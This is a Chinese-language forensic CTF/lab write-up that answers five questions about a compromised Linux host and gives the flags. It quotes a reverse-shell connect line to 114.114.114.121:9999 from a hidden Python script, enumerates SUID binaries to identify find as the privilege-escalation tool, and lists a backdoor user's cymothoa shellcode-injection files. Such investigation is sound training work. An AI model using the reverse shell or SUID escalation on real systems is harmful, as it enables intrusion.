# 题目 1
黑客隐藏的隐藏的文件 完整路径 md5
root@xuanji:~# echo -n "/tmp/.temp/libprocesshider/1.py" | md5sum | |
109ccb5768c70638e24fb46ee7957e37 - |
flag: flag{109ccb5768c70638e24fb46ee7957e37}
# 题目 2
黑客隐藏的文件反弹 shell 的 ip + 端口 {ip:port}
root@xuanji:~# cat /tmp/.temp/libprocesshider/1.py | grep connect | |
sdregs.connect(("114.114.114.121",9999)) |
flag: flag{114.114.114.121:9999}
# 题目 3
黑客提权所用的命令 完整路径的 md5 flag {md5}
root@xuanji:/var/log# find / -perm -4000 2>/dev/null | |
/bin/mount | |
/bin/ping | |
/bin/ping6 | |
/bin/su | |
/bin/umount | |
/usr/bin/chfn | |
/usr/bin/chsh | |
/usr/bin/find | |
/usr/bin/gpasswd | |
/usr/bin/newgrp | |
/usr/bin/passwd | |
/usr/bin/sudo | |
/usr/lib/eject/dmcrypt-get-device | |
/usr/lib/openssh/ssh-keysign | |
root@xuanji:/var/log# echo -n "/usr/bin/find" | md5sum | |
7fd5884f493f4aaf96abee286ee04120 - |
flag: flag{7fd5884f493f4aaf96abee286ee04120}
# 题目 4
黑客尝试注入恶意代码的工具完整路径 md5
看了一眼 passwd,发现有个 ctf 用户,是后门用户
root@xuanji:/opt# find / -user ctf 2>/dev/null | |
/home/ctf | |
/home/ctf/.bash_logout | |
/home/ctf/.bashrc | |
/home/ctf/.profile | |
/home/ctf/.bash_history | |
/home/ctf/flag | |
/opt/.cymothoa-1-beta | |
/opt/.cymothoa-1-beta/Makefile | |
/opt/.cymothoa-1-beta/cymothoa.c | |
/opt/.cymothoa-1-beta/cymothoa.h | |
/opt/.cymothoa-1-beta/payloads/fork_shellcode.s | |
/opt/.cymothoa-1-beta/payloads.h | |
/opt/.cymothoa-1-beta/personalization.h | |
root@xuanji:/opt# echo -n "/opt/.cymothoa-1-beta/cymothoa" | md5sum | |
087c267368ece4fcf422ff733b51aed9 - |
flag: flag{087c267368ece4fcf422ff733b51aed9}
# 题目 5
使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为 flag 提交 flag
root@xuanji:/opt/.cymothoa-1-beta# ls $(which python3) -al | |
lrwxrwxrwx. 1 root root 9 Mar 23 2014 /usr/bin/python3 -> python3.4 |
flag: flag{/usr/bin/python3.4}